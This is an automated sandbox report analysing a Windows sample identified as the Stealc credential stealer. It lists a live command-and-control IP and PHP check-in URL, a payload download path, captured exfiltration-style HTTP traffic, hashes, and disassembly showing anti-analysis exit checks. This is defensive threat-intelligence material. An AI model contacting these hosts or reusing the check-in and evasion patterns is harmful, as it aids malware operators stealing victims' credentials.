                http://185.215.113.37/vfile.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpSfile.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpXfile.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1532868
                Start date and time:2024-10-14 03:57:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 7s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 92
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.947988679118368
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'838'592 bytes
                MD5:2e51f94d1dc93d7faaf5da2708fed2de
                SHA1:3e9f21e5c0154ea1eb6ad2829ec86bfdd8ef178c
                SHA256:cc6b3fcb986b487a1e9fdb5d0a0fc23ff1ea90cbc55733439c83898eb189773f
                SHA512:d65a4258c9578444fdb91a0cab3fae265e9e5eb0e0fa6dbf7344e4dc47f10536b0689e1406b4e52ae7bb39f71d8f205fa5257d1d7f64a10c6076473d24985c0a
                SSDEEP:49152:F3RkDDb9IiLFnZq/7DLx5mhkUsKa9Q3lr:4HFCXx9U1am3h
                TLSH:2A85335CFECD7DB8F70D773A803D5AA95E206793039C31E984820679625318A9FF0A67
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0xa97000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007FA43051845Ah
                paddsb mm3, qword ptr [ebx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add cl, ch
                add byte ptr [eax], ah
                add byte ptr [eax], al
                add byte ptr [esi], al
                or al, byte ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax+0Ah], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                push es
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add eax, 0000000Ah
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [esi], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                push es
                or al, byte ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edi], cl
                or al, byte ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [ecx], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                or ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                or byte ptr [eax+00000000h], al
                add byte ptr [eax], al

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x2280019fb598d8c0b44d706761440c327a7f2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x29d0000x2001947f1efdd5e8b3934ebb10148463d9aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                eyyunreg0x4fb0000x19b0000x19ac005800e116ecc9e0aa3b886b6d473bb0efFalse0.9950084163877054data7.954155944105544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                cayhnmlo0x6960000x10000x400633cb3f174521b23208a1645ee71c5caFalse0.7919921875data6.173438865718246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x6970000x30000x2200e2101cef3a168c9144935d02aa23789cFalse0.060546875DOS executable (COM)0.7242961351499368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-14T03:58:03.786676+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 14, 2024 03:58:02.844085932 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 03:58:02.849061966 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 03:58:02.849351883 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 03:58:02.849592924 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 03:58:02.854419947 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 03:58:03.555542946 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 03:58:03.555866957 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 03:58:03.559432983 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 03:58:03.564323902 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 03:58:03.786614895 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 03:58:03.786675930 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 03:58:06.722495079 CEST4970480192.168.2.5185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704185.215.113.37806756C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 14, 2024 03:58:02.849592924 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 14, 2024 03:58:03.555542946 CEST203INHTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:58:03 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 14, 2024 03:58:03.559432983 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 34 37 33 46 39 33 44 46 30 30 33 32 38 33 38 39 36 32 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a
                Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="hwid"E1473F93DF003283896264------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="build"doma------GIEHJDHCBAEHJJJKKFID--
                Oct 14, 2024 03:58:03.786614895 CEST210INHTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:58:03 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:21:57:59
                Start date:13/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x2e0000
                File size:1'838'592 bytes
                MD5 hash:2E51F94D1DC93D7FAAF5DA2708FED2DE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:7.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.7%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
                  execution_graph 13536 2f69f0 13581 2e2260 13536->13581 13560 2f6a64 13561 2fa9b0 4 API calls 13560->13561 13562 2f6a6b 13561->13562 13563 2fa9b0 4 API calls 13562->13563 13564 2f6a72 13563->13564 13565 2fa9b0 4 API calls 13564->13565 13566 2f6a79 13565->13566 13567 2fa9b0 4 API calls 13566->13567 13568 2f6a80 13567->13568 13733 2fa8a0 13568->13733 13570 2f6b0c 13737 2f6920 GetSystemTime 13570->13737 13571 2f6a89 13571->13570 13573 2f6ac2 OpenEventA 13571->13573 13575 2f6ad9 13573->13575 13576 2f6af5 CloseHandle Sleep 13573->13576 13580 2f6ae1 CreateEventA 13575->13580 13578 2f6b0a 13576->13578 13578->13571 13580->13570 13934 2e45c0 13581->13934 13583 2e2274 13584 2e45c0 2 API calls 13583->13584 13585 2e228d 13584->13585 13586 2e45c0 2 API calls 13585->13586 13587 2e22a6 13586->13587 13588 2e45c0 2 API calls 13587->13588 13589 2e22bf 13588->13589 13590 2e45c0 2 API calls 13589->13590 13591 2e22d8 13590->13591 13592 2e45c0 2 API calls 13591->13592 13593 2e22f1 13592->13593 13594 2e45c0 2 API calls 13593->13594 13595 2e230a 13594->13595 13596 2e45c0 2 API calls 13595->13596 13597 2e2323 13596->13597 13598 2e45c0 2 API calls 13597->13598 13599 2e233c 13598->13599 13600 2e45c0 2 API calls 13599->13600 13601 2e2355 13600->13601 13602 2e45c0 2 API calls 13601->13602 13603 2e236e 13602->13603 13604 2e45c0 2 API calls 13603->13604 13605 2e2387 13604->13605 13606 2e45c0 2 API calls 13605->13606 13607 2e23a0 13606->13607 13608 2e45c0 2 API calls 13607->13608 13609 2e23b9 13608->13609 13610 2e45c0 2 API calls 13609->13610 13611 2e23d2 13610->13611 13612 2e45c0 2 API calls 13611->13612 13613 2e23eb 13612->13613 13614 2e45c0 2 API calls 13613->13614 13615 2e2404 13614->13615 13616 2e45c0 2 API calls 13615->13616 13617 2e241d 13616->13617 13618 2e45c0 2 API calls 13617->13618 13619 2e2436 13618->13619 13620 2e45c0 2 API calls 13619->13620 13621 2e244f 13620->13621 13622 2e45c0 2 API calls 13621->13622 13623 2e2468 13622->13623 13624 2e45c0 2 API calls 13623->13624 13625 2e2481 13624->13625 13626 2e45c0 2 API calls 13625->13626 13627 2e249a 13626->13627 13628 2e45c0 2 API calls 13627->13628 13629 2e24b3 13628->13629 13630 2e45c0 2 API calls 13629->13630 13631 2e24cc 13630->13631 13632 2e45c0 2 API calls 13631->13632 13633 2e24e5 13632->13633 13634 2e45c0 2 API calls 13633->13634 13635 2e24fe 13634->13635 13636 2e45c0 2 API calls 13635->13636 13637 2e2517 13636->13637 13638 2e45c0 2 API calls 13637->13638 13639 2e2530 13638->13639 13640 2e45c0 2 API calls 13639->13640 13641 2e2549 13640->13641 13642 2e45c0 2 API calls 13641->13642 13643 2e2562 13642->13643 13644 2e45c0 2 API calls 13643->13644 13645 2e257b 13644->13645 13646 2e45c0 2 API calls 13645->13646 13647 2e2594 13646->13647 13648 2e45c0 2 API calls 13647->13648 13649 2e25ad 13648->13649 13650 2e45c0 2 API calls 13649->13650 13651 2e25c6 13650->13651 13652 2e45c0 2 API calls 13651->13652 13653 2e25df 13652->13653 13654 2e45c0 2 API calls 13653->13654 13655 2e25f8 13654->13655 13656 2e45c0 2 API calls 13655->13656 13657 2e2611 13656->13657 13658 2e45c0 2 API calls 13657->13658 13659 2e262a 13658->13659 13660 2e45c0 2 API calls 13659->13660 13661 2e2643 13660->13661 13662 2e45c0 2 API calls 13661->13662 13663 2e265c 13662->13663 13664 2e45c0 2 API calls 13663->13664 13665 2e2675 13664->13665 13666 2e45c0 2 API calls 13665->13666 13667 2e268e 13666->13667 13668 2f9860 13667->13668 13939 2f9750 GetPEB 13668->13939 13670 2f9868 13671 2f9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13670->13671 13672 2f987a 13670->13672 13673 2f9b0d 13671->13673 13674 2f9af4 GetProcAddress 13671->13674 13677 2f988c 21 API calls 13672->13677 13675 2f9b46 13673->13675 13676 2f9b16 GetProcAddress GetProcAddress 13673->13676 13674->13673 13678 2f9b4f GetProcAddress 13675->13678 13679 2f9b68 13675->13679 13676->13675 13677->13671 13678->13679 13680 2f9b89 13679->13680 13681 2f9b71 GetProcAddress 13679->13681 13682 2f9b92 GetProcAddress GetProcAddress 13680->13682 13683 2f6a00 13680->13683 13681->13680 13682->13683 13684 2fa740 13683->13684 13685 2fa750 13684->13685 13686 2f6a0d 13685->13686 13687 2fa77e lstrcpy 13685->13687 13688 2e11d0 13686->13688 13687->13686 13689 2e11e8 13688->13689 13690 2e120f ExitProcess 13689->13690 13691 2e1217 13689->13691 13692 2e1160 GetSystemInfo 13691->13692 13693 2e117c ExitProcess 13692->13693 13694 2e1184 13692->13694 13695 2e1110 GetCurrentProcess VirtualAllocExNuma 13694->13695 13696 2e1149 13695->13696 13697 2e1141 ExitProcess 13695->13697 13940 2e10a0 VirtualAlloc 13696->13940 13700 2e1220 13944 2f89b0 13700->13944 13703 2e1249 __aulldiv 13704 2e129a 13703->13704 13705 2e1292 ExitProcess 13703->13705 13706 2f6770 GetUserDefaultLangID 13704->13706 13707 2f67d3 13706->13707 13708 2f6792 13706->13708 13714 2e1190 13707->13714 13708->13707 13709 2f67ad ExitProcess 13708->13709 13710 2f67cb ExitProcess 13708->13710 13711 2f67b7 ExitProcess 13708->13711 13712 2f67a3 ExitProcess 13708->13712 13713 2f67c1 ExitProcess 13708->13713 13715 2f78e0 3 API calls 13714->13715 13717 2e119e 13715->13717 13716 2e11cc 13721 2f7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13716->13721 13717->13716 13718 2f7850 3 API calls 13717->13718 13719 2e11b7 13718->13719 13719->13716 13720 2e11c4 ExitProcess 13719->13720 13722 2f6a30 13721->13722 13723 2f78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13722->13723 13724 2f6a43 13723->13724 13725 2fa9b0 13724->13725 13946 2fa710 13725->13946 13727 2fa9c1 lstrlen 13729 2fa9e0 13727->13729 13728 2faa18 13947 2fa7a0 13728->13947 13729->13728 13731 2fa9fa lstrcpy lstrcat 13729->13731 13731->13728 13732 2faa24 13732->13560 13734 2fa8bb 13733->13734 13735 2fa90b 13734->13735 13736 2fa8f9 lstrcpy 13734->13736 13735->13571 13736->13735 13951 2f6820 13737->13951 13739 2f698e 13740 2f6998 sscanf 13739->13740 13980 2fa800 13740->13980 13742 2f69aa SystemTimeToFileTime SystemTimeToFileTime 13743 2f69ce 13742->13743 13744 2f69e0 13742->13744 13743->13744 13745 2f69d8 ExitProcess 13743->13745 13746 2f5b10 13744->13746 13747 2f5b1d 13746->13747 13748 2fa740 lstrcpy 13747->13748 13749 2f5b2e 13748->13749 13982 2fa820 lstrlen 13749->13982 13752 2fa820 2 API calls 13753 2f5b64 13752->13753 13754 2fa820 2 API calls 13753->13754 13755 2f5b74 13754->13755 13986 2f6430 13755->13986 13758 2fa820 2 API calls 13759 2f5b93 13758->13759 13760 2fa820 2 API calls 13759->13760 13761 2f5ba0 13760->13761 13762 2fa820 2 API calls 13761->13762 13763 2f5bad 13762->13763 13764 2fa820 2 API calls 13763->13764 13765 2f5bf9 13764->13765 13995 2e26a0 13765->13995 13773 2f5cc3 13774 2f6430 lstrcpy 13773->13774 13775 2f5cd5 13774->13775 13776 2fa7a0 lstrcpy 13775->13776 13777 2f5cf2 13776->13777 13778 2fa9b0 4 API calls 13777->13778 13779 2f5d0a 13778->13779 13780 2fa8a0 lstrcpy 13779->13780 13781 2f5d16 13780->13781 13782 2fa9b0 4 API calls 13781->13782 13783 2f5d3a 13782->13783 13784 2fa8a0 lstrcpy 13783->13784 13785 2f5d46 13784->13785 13786 2fa9b0 4 API calls 13785->13786 13787 2f5d6a 13786->13787 13788 2fa8a0 lstrcpy 13787->13788 13789 2f5d76 13788->13789 13790 2fa740 lstrcpy 13789->13790 13791 2f5d9e 13790->13791 14721 2f7500 GetWindowsDirectoryA 13791->14721 13794 2fa7a0 lstrcpy 13795 2f5db8 13794->13795 14731 2e4880 13795->14731 13797 2f5dbe 14876 2f17a0 13797->14876 13799 2f5dc6 13800 2fa740 lstrcpy 13799->13800 13801 2f5de9 13800->13801 13802 2e1590 lstrcpy 13801->13802 13803 2f5dfd 13802->13803 14892 2e5960 13803->14892 13805 2f5e03 15036 2f1050 13805->15036 13807 2f5e0e 13808 2fa740 lstrcpy 13807->13808 13809 2f5e32 13808->13809 13810 2e1590 lstrcpy 13809->13810 13811 2f5e46 13810->13811 13812 2e5960 34 API calls 13811->13812 13813 2f5e4c 13812->13813 15040 2f0d90 13813->15040 13815 2f5e57 13816 2fa740 lstrcpy 13815->13816 13817 2f5e79 13816->13817 13818 2e1590 lstrcpy 13817->13818 13819 2f5e8d 13818->13819 13820 2e5960 34 API calls 13819->13820 13821 2f5e93 13820->13821 15047 2f0f40 13821->15047 13823 2f5e9e 13824 2e1590 lstrcpy 13823->13824 13825 2f5eb5 13824->13825 15052 2f1a10 13825->15052 13827 2f5eba 13828 2fa740 lstrcpy 13827->13828 13829 2f5ed6 13828->13829 15396 2e4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13829->15396 13831 2f5edb 13832 2e1590 lstrcpy 13831->13832 13833 2f5f5b 13832->13833 15403 2f0740 13833->15403 13835 2f5f60 13836 2fa740 lstrcpy 13835->13836 13837 2f5f86 13836->13837 13838 2e1590 lstrcpy 13837->13838 13839 2f5f9a 13838->13839 13840 2e5960 34 API calls 13839->13840 13841 2f5fa0 13840->13841 13935 2e45d1 RtlAllocateHeap 13934->13935 13937 2e4621 VirtualProtect 13935->13937 13937->13583 13939->13670 13941 2e10c2 codecvt 13940->13941 13942 2e10fd 13941->13942 13943 2e10e2 VirtualFree 13941->13943 13942->13700 13943->13942 13945 2e1233 GlobalMemoryStatusEx 13944->13945 13945->13703 13946->13727 13948 2fa7c2 13947->13948 13949 2fa7ec 13948->13949 13950 2fa7da lstrcpy 13948->13950 13949->13732 13950->13949 13952 2fa740 lstrcpy 13951->13952 13953 2f6833 13952->13953 13954 2fa9b0 4 API calls 13953->13954 13955 2f6845 13954->13955 13956 2fa8a0 lstrcpy 13955->13956 13957 2f684e 13956->13957 13958 2fa9b0 4 API calls 13957->13958 13959 2f6867 13958->13959 13960 2fa8a0 lstrcpy 13959->13960 13961 2f6870 13960->13961 13962 2fa9b0 4 API calls 13961->13962 13963 2f688a 13962->13963 13964 2fa8a0 lstrcpy 13963->13964 13965 2f6893 13964->13965 13966 2fa9b0 4 API calls 13965->13966 13967 2f68ac 13966->13967 13968 2fa8a0 lstrcpy 13967->13968 13969 2f68b5 13968->13969 13970 2fa9b0 4 API calls 13969->13970 13971 2f68cf 13970->13971 13972 2fa8a0 lstrcpy 13971->13972 13973 2f68d8 13972->13973 13974 2fa9b0 4 API calls 13973->13974 13975 2f68f3 13974->13975 13976 2fa8a0 lstrcpy 13975->13976 13977 2f68fc 13976->13977 13978 2fa7a0 lstrcpy 13977->13978 13979 2f6910 13978->13979 13979->13739 13981 2fa812 13980->13981 13981->13742 13983 2fa83f 13982->13983 13984 2f5b54 13983->13984 13985 2fa87b lstrcpy 13983->13985 13984->13752 13985->13984 13987 2fa8a0 lstrcpy 13986->13987 13988 2f6443 13987->13988 13989 2fa8a0 lstrcpy 13988->13989 13990 2f6455 13989->13990 13991 2fa8a0 lstrcpy 13990->13991 13992 2f6467 13991->13992 13993 2fa8a0 lstrcpy 13992->13993 13994 2f5b86 13993->13994 13994->13758 13996 2e45c0 2 API calls 13995->13996 13997 2e26b4 13996->13997 13998 2e45c0 2 API calls 13997->13998 13999 2e26d7 13998->13999 14000 2e45c0 2 API calls 13999->14000 14001 2e26f0 14000->14001 14002 2e45c0 2 API calls 14001->14002 14003 2e2709 14002->14003 14004 2e45c0 2 API calls 14003->14004 14005 2e2736 14004->14005 14006 2e45c0 2 API calls 14005->14006 14007 2e274f 14006->14007 14008 2e45c0 2 API calls 14007->14008 14009 2e2768 14008->14009 14010 2e45c0 2 API calls 14009->14010 14011 2e2795 14010->14011 14012 2e45c0 2 API calls 14011->14012 14013 2e27ae 14012->14013 14014 2e45c0 2 API calls 14013->14014 14015 2e27c7 14014->14015 14016 2e45c0 2 API calls 14015->14016 14017 2e27e0 14016->14017 14018 2e45c0 2 API calls 14017->14018 14019 2e27f9 14018->14019 14020 2e45c0 2 API calls 14019->14020 14021 2e2812 14020->14021 14022 2e45c0 2 API calls 14021->14022 14023 2e282b 14022->14023 14024 2e45c0 2 API calls 14023->14024 14025 2e2844 14024->14025 14026 2e45c0 2 API calls 14025->14026 14027 2e285d 14026->14027 14028 2e45c0 2 API calls 14027->14028 14029 2e2876 14028->14029 14030 2e45c0 2 API calls 